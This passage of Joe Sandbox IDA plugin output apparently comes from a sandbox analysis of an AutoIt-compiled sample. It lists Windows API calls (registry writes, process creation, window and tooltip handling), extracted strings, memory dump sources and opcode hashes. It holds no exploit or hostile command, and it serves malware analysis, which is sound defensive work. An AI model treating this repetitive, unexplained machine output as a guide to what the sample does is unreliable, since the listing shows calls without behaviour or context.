                                                                                • RegCloseKey.ADVAPI32(?), ref: 0065C881
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0065C88E
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0065C960
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 9721498-966354055
                                                                                • Opcode ID: 003afec32f1e1d6d6ccbd4cda62d05385f685bfee550a70ac51db3af06bc5c13
                                                                                • Instruction ID: 469e7ccfdb44d6cfd9f4c2b5985c83a020c999d44f47d9f7725c2f0f47b09f3d
                                                                                • Opcode Fuzzy Hash: 003afec32f1e1d6d6ccbd4cda62d05385f685bfee550a70ac51db3af06bc5c13
                                                                                • Instruction Fuzzy Hash: 15126E356043019FD714DF18C895A6ABBE6FF88725F04885EF8899B3A2DB31ED45CB81
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 006609C6
                                                                                • _wcslen.LIBCMT ref: 00660A01
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00660A54
                                                                                • _wcslen.LIBCMT ref: 00660A8A
                                                                                • _wcslen.LIBCMT ref: 00660B06
                                                                                • _wcslen.LIBCMT ref: 00660B81
                                                                                  • Part of subcall function 005EF9F2: _wcslen.LIBCMT ref: 005EF9FD
                                                                                  • Part of subcall function 00632BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00632BFA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 1103490817-4258414348
                                                                                • Opcode ID: de94c2e8d6b58839b2ad6876732bb34a5eb069232c0bb959219f79bb05443614
                                                                                • Instruction ID: 59ac7c5156c36f96a59c38b65b5dafb84b8b662b8e590bb837fbd47bd5ee8152
                                                                                • Opcode Fuzzy Hash: de94c2e8d6b58839b2ad6876732bb34a5eb069232c0bb959219f79bb05443614
                                                                                • Instruction Fuzzy Hash: 3BE18C352083029FCB14DF29C45096BBBE2BF98354F14896DF8969B362D731ED46CB81
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 1256254125-909552448
                                                                                • Opcode ID: 3e7a59185af29e6e9b853350fbfdf65edfe4ea927e555ffbc4425ac0514a8891
                                                                                • Instruction ID: 9affe1e7ace5a602a54e6fcb64bff2c9b483011fe2ea3ef52a9302dbd72f2bb3
                                                                                • Opcode Fuzzy Hash: 3e7a59185af29e6e9b853350fbfdf65edfe4ea927e555ffbc4425ac0514a8891
                                                                                • Instruction Fuzzy Hash: 3071D13261022A8FCF20DE6CCD515FA3B97ABA0775F150529FC669B384EA31CD49C3A0
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0066835A
                                                                                • _wcslen.LIBCMT ref: 0066836E
                                                                                • _wcslen.LIBCMT ref: 00668391
                                                                                • _wcslen.LIBCMT ref: 006683B4
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006683F2
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00665BF2), ref: 0066844E
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00668487
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006684CA
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00668501
                                                                                • FreeLibrary.KERNEL32(?), ref: 0066850D
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0066851D
                                                                                • DestroyIcon.USER32(?,?,?,?,?,00665BF2), ref: 0066852C
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00668549
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00668555
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 799131459-1154884017
                                                                                • Opcode ID: 2068d1092b3c40837201d71fbd4950a2c96b651d92ab82c8017504ca6f57e6bf
                                                                                • Instruction ID: c2c12b2adcaa39e740bd29d62df9b324ce1ad29637a3f583584ce897fd3d8e16
                                                                                • Opcode Fuzzy Hash: 2068d1092b3c40837201d71fbd4950a2c96b651d92ab82c8017504ca6f57e6bf
                                                                                • Instruction Fuzzy Hash: 8E61D07150060ABEEB14DF74CC45BFE7BA9BB44720F10420AF916D62D0DBB49980CBA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 0-1645009161
                                                                                • Opcode ID: 7a4c5b7e2f0aee2692f589d3a51129e578087f665747c6756297825e23b1ee0d
                                                                                • Instruction ID: e2ff2ca647179cd9d448e72b05f7e882aedc3363f01d34744dff93e36c7ae1c4
                                                                                • Opcode Fuzzy Hash: 7a4c5b7e2f0aee2692f589d3a51129e578087f665747c6756297825e23b1ee0d
                                                                                • Instruction Fuzzy Hash: 0381E67160060ABBDB21AF64DC46FFA7F69BF99300F044427F905AB292EB70D941C791
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 00635A2E
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00635A40
                                                                                • SetWindowTextW.USER32(?,?), ref: 00635A57
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00635A6C
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00635A72
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00635A82
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00635A88
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00635AA9
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00635AC3
                                                                                • GetWindowRect.USER32(?,?), ref: 00635ACC
                                                                                • _wcslen.LIBCMT ref: 00635B33
                                                                                • SetWindowTextW.USER32(?,?), ref: 00635B6F
                                                                                • GetDesktopWindow.USER32 ref: 00635B75
                                                                                • GetWindowRect.USER32(00000000), ref: 00635B7C
                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00635BD3
                                                                                • GetClientRect.USER32(?,?), ref: 00635BE0
                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00635C05
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00635C2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                • String ID:
                                                                                • API String ID: 895679908-0
                                                                                • Opcode ID: 2ccd721349040fcafec020dd846d008ee3024c29d2e15045187e312aa652f89a
                                                                                • Instruction ID: f218066b1884f4ff4eff41508485d360acf17137cdb66762bf788816bfa65e49
                                                                                • Opcode Fuzzy Hash: 2ccd721349040fcafec020dd846d008ee3024c29d2e15045187e312aa652f89a
                                                                                • Instruction Fuzzy Hash: EE717F31900B05AFDB20DFA8CE55AAEBBF6FF48715F104518E583A36A0D775E940CB94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[i
                                                                                • API String ID: 176396367-3562049154
                                                                                • Opcode ID: 3f8881059236ff925fcaa4621ba5edcc3c278216fd333110cc24d943afd56aac
                                                                                • Instruction ID: c9575093d977e80bced1fda157aa66454e6f78c89b6647b20ea3bb116118c7cf
                                                                                • Opcode Fuzzy Hash: 3f8881059236ff925fcaa4621ba5edcc3c278216fd333110cc24d943afd56aac
                                                                                • Instruction Fuzzy Hash: 33E1D432A00536ABCF289FA8C8556FEBBB6BF44710F54811AE456E7341DB30AF8587D0
                                                                                APIs
                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005F00C6
                                                                                  • Part of subcall function 005F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(006A070C,00000FA0,706CD16E,?,?,?,?,006123B3,000000FF), ref: 005F011C
                                                                                  • Part of subcall function 005F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006123B3,000000FF), ref: 005F0127
                                                                                  • Part of subcall function 005F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006123B3,000000FF), ref: 005F0138
                                                                                  • Part of subcall function 005F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005F014E
                                                                                  • Part of subcall function 005F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005F015C
                                                                                  • Part of subcall function 005F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005F016A
                                                                                  • Part of subcall function 005F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005F0195
                                                                                  • Part of subcall function 005F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005F01A0
                                                                                • ___scrt_fastfail.LIBCMT ref: 005F00E7
                                                                                  • Part of subcall function 005F00A3: __onexit.LIBCMT ref: 005F00A9
                                                                                Strings
                                                                                • kernel32.dll, xrefs: 005F0133
                                                                                • SleepConditionVariableCS, xrefs: 005F0154
                                                                                • InitializeConditionVariable, xrefs: 005F0148
                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005F0122
                                                                                • WakeAllConditionVariable, xrefs: 005F0162
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                • API String ID: 66158676-1714406822
                                                                                • Opcode ID: e02e0dd9ffb298b7ea5d1fdbac19ecb3fe83234430cb354c74bd191a3ad4673b
                                                                                • Instruction ID: a01f5b3b1d453fe07a4c2251134a1ad61a0c9d8c5485c4496a9bba04818ad400
                                                                                • Opcode Fuzzy Hash: e02e0dd9ffb298b7ea5d1fdbac19ecb3fe83234430cb354c74bd191a3ad4673b
                                                                                • Instruction Fuzzy Hash: C9213E32644B156BE7106BA4AC09F7A7B9AFF46B60F051135F941A32D2DFB4AC00CA50
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(00000000,00000000,0066CC08), ref: 00644527
                                                                                • _wcslen.LIBCMT ref: 0064453B
                                                                                • _wcslen.LIBCMT ref: 00644599
                                                                                • _wcslen.LIBCMT ref: 006445F4
                                                                                • _wcslen.LIBCMT ref: 0064463F
                                                                                • _wcslen.LIBCMT ref: 006446A7
                                                                                  • Part of subcall function 005EF9F2: _wcslen.LIBCMT ref: 005EF9FD
                                                                                • GetDriveTypeW.KERNEL32(?,00696BF0,00000061), ref: 00644743
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2055661098-1000479233
                                                                                • Opcode ID: 24c5dad5db32f7fba3caa104efe25b56e97e7cc3ef33866d45072a027210a4f0
                                                                                • Instruction ID: 1cce9bbbfaf26e01f7fc5d78032a45a17b2e1fe3be0ef8d27780fe9203cb3e3b
                                                                                • Opcode Fuzzy Hash: 24c5dad5db32f7fba3caa104efe25b56e97e7cc3ef33866d45072a027210a4f0
                                                                                • Instruction Fuzzy Hash: 9BB1D1716083029FC714DF28C896AAABBE6BFE5760F50491EF496C7391EB30D845CB52
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00669147
                                                                                  • Part of subcall function 00667674: ClientToScreen.USER32(?,?), ref: 0066769A
                                                                                  • Part of subcall function 00667674: GetWindowRect.USER32(?,?), ref: 00667710
                                                                                  • Part of subcall function 00667674: PtInRect.USER32(?,?,00668B89), ref: 00667720
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 006691B0
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006691BB
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006691DE
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00669225
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0066923E
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00669255
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00669277
                                                                                • DragFinish.SHELL32(?), ref: 0066927E
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00669371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#j
                                                                                • API String ID: 221274066-3710821403
                                                                                • Opcode ID: 535027fc07c1e7e18f64b88b5099d27f2b8b3f7d8f6eeacad68d201c7d4089ce
                                                                                • Instruction ID: a22a9937046370a74f252b541fbd8b94885601313c46bbe606f95ae5142807eb
                                                                                • Opcode Fuzzy Hash: 535027fc07c1e7e18f64b88b5099d27f2b8b3f7d8f6eeacad68d201c7d4089ce
                                                                                • Instruction Fuzzy Hash: 37615A71108302AFC711EF54DC89DABBBEAFBC5750F00092EF595922A1DB709A49CB62
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0065B198
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0065B1B0
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0065B1D4
                                                                                • _wcslen.LIBCMT ref: 0065B200
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0065B214
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0065B236
                                                                                • _wcslen.LIBCMT ref: 0065B332
                                                                                  • Part of subcall function 006405A7: GetStdHandle.KERNEL32(000000F6), ref: 006405C6
                                                                                • _wcslen.LIBCMT ref: 0065B34B
                                                                                • _wcslen.LIBCMT ref: 0065B366
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0065B3B6
                                                                                • GetLastError.KERNEL32(00000000), ref: 0065B407
                                                                                • CloseHandle.KERNEL32(?), ref: 0065B439
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065B44A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065B45C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065B46E
                                                                                • CloseHandle.KERNEL32(?), ref: 0065B4E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 2178637699-0
                                                                                • Opcode ID: 61065420e1d03341918f91e64926eef84115c540c8c36991475a8f9a6c26614b
                                                                                • Instruction ID: 7110f9d821f4f2d8f8184391f31db32e9609d9a45d718ac4d567ff757b90e525
                                                                                • Opcode Fuzzy Hash: 61065420e1d03341918f91e64926eef84115c540c8c36991475a8f9a6c26614b
                                                                                • Instruction Fuzzy Hash: 0FF17A316043419FC724EF24C895B6ABBE6BF85310F14855EF8859B3A2DB31EC49CB52
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(006A1990), ref: 00612F8D
                                                                                • GetMenuItemCount.USER32(006A1990), ref: 0061303D
                                                                                • GetCursorPos.USER32(?), ref: 00613081
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0061308A
                                                                                • TrackPopupMenuEx.USER32(006A1990,00000000,?,00000000,00000000,00000000), ref: 0061309D
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006130A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                • String ID: 0
                                                                                • API String ID: 36266755-4108050209
                                                                                • Opcode ID: c9a178c0a489b4e7e73a85876b53952d3aab2e7b8fbda0779ab44011c26b7aa4
                                                                                • Instruction ID: 22a8e486c09689b13878b2f01f82a0f1268340944c158b389b6e856ca9e62e92
                                                                                • Opcode Fuzzy Hash: c9a178c0a489b4e7e73a85876b53952d3aab2e7b8fbda0779ab44011c26b7aa4
                                                                                • Instruction Fuzzy Hash: D8710C70640216BEEB319F28CC59FEABF66FF05324F144217F515662E0C7B1A960C795
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 00666DEB
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00666E5F
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00666E81
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00666E94
                                                                                • DestroyWindow.USER32(?), ref: 00666EB5
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005D0000,00000000), ref: 00666EE4
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00666EFD
                                                                                • GetDesktopWindow.USER32 ref: 00666F16
                                                                                • GetWindowRect.USER32(00000000), ref: 00666F1D
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00666F35
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00666F4D
                                                                                  • Part of subcall function 005E9944: GetWindowLongW.USER32(?,000000EB), ref: 005E9952
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 2429346358-3619404913
                                                                                • Opcode ID: f0b4a353321e18a45f531d631b4abea7b86a92ee76457bca5b9a216356480f63
                                                                                • Instruction ID: f55dadfecf7ab6b8248a6813e579449961f336955573dd88a406190342b5d142
                                                                                • Opcode Fuzzy Hash: f0b4a353321e18a45f531d631b4abea7b86a92ee76457bca5b9a216356480f63
                                                                                • Instruction Fuzzy Hash: 63716674104241AFEB21DF18E848EBBBBEAFB99314F04441EF99987361C771A906CB15
